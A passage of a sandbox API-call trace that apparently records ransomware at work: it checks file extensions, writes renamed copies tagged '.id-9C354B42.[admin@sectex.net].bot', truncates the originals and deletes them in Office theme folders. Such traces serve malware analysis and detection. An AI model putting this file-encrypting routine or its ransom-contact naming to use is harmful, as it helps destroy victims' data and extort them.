	[0044.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.013] lstrlenW (lpString=".dbf") returned 4
	[0044.013] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.013] lstrlenW (lpString=".1cd") returned 4
	[0044.013] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.013] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77
	[0044.013] lstrlenW (lpString=".jpg") returned 4
	[0044.013] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.014] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.014] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.014] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1354) returned 1
	[0044.014] CloseHandle (hObject=0x1a0) returned 1
	[0044.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 0x20
	[0044.014] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.014] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.015] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.015] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.017] GetLastError () returned 0x0
	[0044.017] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x54a, lpOverlapped=0x0) returned 1
	[0044.018] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x550, lpOverlapped=0x0) returned 1
	[0044.019] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.019] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.019] SetEndOfFile (hFile=0x1fc) returned 1
	[0044.019] CloseHandle (hObject=0x1fc) returned 1
	[0044.019] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.019] SetEndOfFile (hFile=0x1a0) returned 1
	[0044.020] CloseHandle (hObject=0x1a0) returned 1
	[0044.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.020] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 1
	[0044.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.020] lstrlenW (lpString=".doc") returned 4
	[0044.020] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.020] lstrlenW (lpString=".docx") returned 5
	[0044.020] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.020] lstrlenW (lpString=".pdf") returned 4
	[0044.021] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString=".xls") returned 4
	[0044.021] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString=".xlsx") returned 5
	[0044.021] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.021] lstrlenW (lpString=".ppt") returned 4
	[0044.021] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.021] lstrlenW (lpString=".zip") returned 4
	[0044.021] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString=".rar") returned 4
	[0044.021] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString=".bz2") returned 4
	[0044.021] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.021] lstrlenW (lpString=".7z") returned 3
	[0044.021] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.021] lstrlenW (lpString=".dbf") returned 4
	[0044.021] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.021] lstrlenW (lpString=".1cd") returned 4
	[0044.021] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.021] lstrlenW (lpString=".jpg") returned 4
	[0044.021] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.021] lstrlenW (lpString=".doc") returned 4
	[0044.021] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.021] lstrlenW (lpString=".docx") returned 5
	[0044.021] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.021] lstrlenW (lpString=".pdf") returned 4
	[0044.021] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.021] lstrlenW (lpString=".xls") returned 4
	[0044.021] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.022] lstrlenW (lpString=".xlsx") returned 5
	[0044.022] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.022] lstrlenW (lpString=".ppt") returned 4
	[0044.022] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.022] lstrlenW (lpString=".zip") returned 4
	[0044.022] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.022] lstrlenW (lpString=".rar") returned 4
	[0044.022] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.022] lstrlenW (lpString=".bz2") returned 4
	[0044.022] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.022] lstrlenW (lpString=".7z") returned 3
	[0044.022] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.022] lstrlenW (lpString=".dbf") returned 4
	[0044.022] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.022] lstrlenW (lpString=".1cd") returned 4
	[0044.022] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76
	[0044.022] lstrlenW (lpString=".jpg") returned 4
	[0044.022] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.022] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0044.022] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0044.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.023] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=32433) returned 1
	[0044.023] CloseHandle (hObject=0x1a0) returned 1
	[0044.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 0x20
	[0044.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.023] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.023] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.023] GetLastError () returned 0x0
	[0044.023] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x7eb1, lpOverlapped=0x0) returned 1
	[0044.027] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x7ec0, lpOverlapped=0x0) returned 1
	[0044.028] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.028] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.028] SetEndOfFile (hFile=0x1fc) returned 1
	[0044.028] CloseHandle (hObject=0x1fc) returned 1
	[0044.028] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.029] SetEndOfFile (hFile=0x1a0) returned 1
	[0044.029] CloseHandle (hObject=0x1a0) returned 1
	[0044.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.030] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1
	[0044.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.030] lstrlenW (lpString=".doc") returned 4
	[0044.030] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.030] lstrlenW (lpString=".docx") returned 5
	[0044.030] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.030] lstrlenW (lpString=".pdf") returned 4
	[0044.030] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.030] lstrlenW (lpString=".xls") returned 4
	[0044.030] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.030] lstrlenW (lpString=".xlsx") returned 5
	[0044.030] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.030] lstrlenW (lpString=".ppt") returned 4
	[0044.030] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.030] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.030] lstrlenW (lpString=".zip") returned 4
	[0044.030] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.030] lstrlenW (lpString=".rar") returned 4
	[0044.030] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.031] lstrlenW (lpString=".bz2") returned 4
	[0044.031] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString=".7z") returned 3
	[0044.031] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.031] lstrlenW (lpString=".dbf") returned 4
	[0044.031] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.031] lstrlenW (lpString=".1cd") returned 4
	[0044.031] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.031] lstrlenW (lpString=".jpg") returned 4
	[0044.031] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.031] lstrlenW (lpString=".doc") returned 4
	[0044.031] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString=".docx") returned 5
	[0044.031] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0044.031] lstrlenW (lpString=".pdf") returned 4
	[0044.031] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString=".xls") returned 4
	[0044.031] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0044.031] lstrlenW (lpString=".xlsx") returned 5
	[0044.031] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0044.031] lstrlenW (lpString=".ppt") returned 4
	[0044.031] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0044.031] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.031] lstrlenW (lpString=".zip") returned 4
	[0044.031] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0044.031] lstrlenW (lpString=".rar") returned 4
	[0044.031] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0044.031] lstrlenW (lpString=".bz2") returned 4
	[0044.031] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0044.031] lstrlenW (lpString=".7z") returned 3
	[0044.032] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0044.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.032] lstrlenW (lpString=".dbf") returned 4
	[0044.032] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0044.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.032] lstrlenW (lpString=".1cd") returned 4
	[0044.032] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0044.032] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77
	[0044.032] lstrlenW (lpString=".jpg") returned 4
	[0044.032] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0044.032] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0044.032] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0044.032] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.033] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=5120) returned 1
	[0044.033] CloseHandle (hObject=0x1a0) returned 1
	[0044.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 0x20
	[0044.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0044.034] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.034] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0044.035] GetLastError () returned 0x0
	[0044.035] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1400, lpOverlapped=0x0) returned 1
	[0044.037] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1410, lpOverlapped=0x0) returned 1
	[0044.038] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.038] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.038] SetEndOfFile (hFile=0x1fc) returned 1
	[0044.038] CloseHandle (hObject=0x1fc) returned 1
	[0044.038] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.038] SetEndOfFile (hFile=0x1a0) returned 1
	[0044.039] CloseHandle (hObject=0x1a0) returned 1
	[0044.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0044.039] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 1
	[0044.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.039] lstrlenW (lpString=".doc") returned 4
	[0044.040] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.040] lstrlenW (lpString=".docx") returned 5
	[0044.040] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.040] lstrlenW (lpString=".pdf") returned 4
	[0044.040] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.040] lstrlenW (lpString=".xls") returned 4
	[0044.040] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.040] lstrlenW (lpString=".xlsx") returned 5
	[0044.040] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0044.040] lstrlenW (lpString=".ppt") returned 4
	[0044.040] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0044.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.040] lstrlenW (lpString=".zip") returned 4
	[0044.040] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0044.040] lstrlenW (lpString=".rar") returned 4
	[0044.040] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0044.040] lstrlenW (lpString=".bz2") returned 4
	[0044.040] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0044.040] lstrlenW (lpString=".7z") returned 3
	[0044.040] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0044.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.040] lstrlenW (lpString=".dbf") returned 4
	[0044.040] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0044.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.040] lstrlenW (lpString=".1cd") returned 4
	[0044.040] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0044.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.040] lstrlenW (lpString=".jpg") returned 4
	[0044.040] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0044.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76
	[0044.040] lstrlenW (lpString=".doc") returned 4
	[0044.040] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0044.040] lstrlenW (lpString=".docx") returned 5
	[0044.040] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0044.041] lstrlenW (lpString=".pdf") returned 4
	[0044.041] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0044.041] lstrlenW (lpString=".xls") returned 4
	[0044.041] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0044.041] lstrlenW (lpString=".xlsx") returned 5
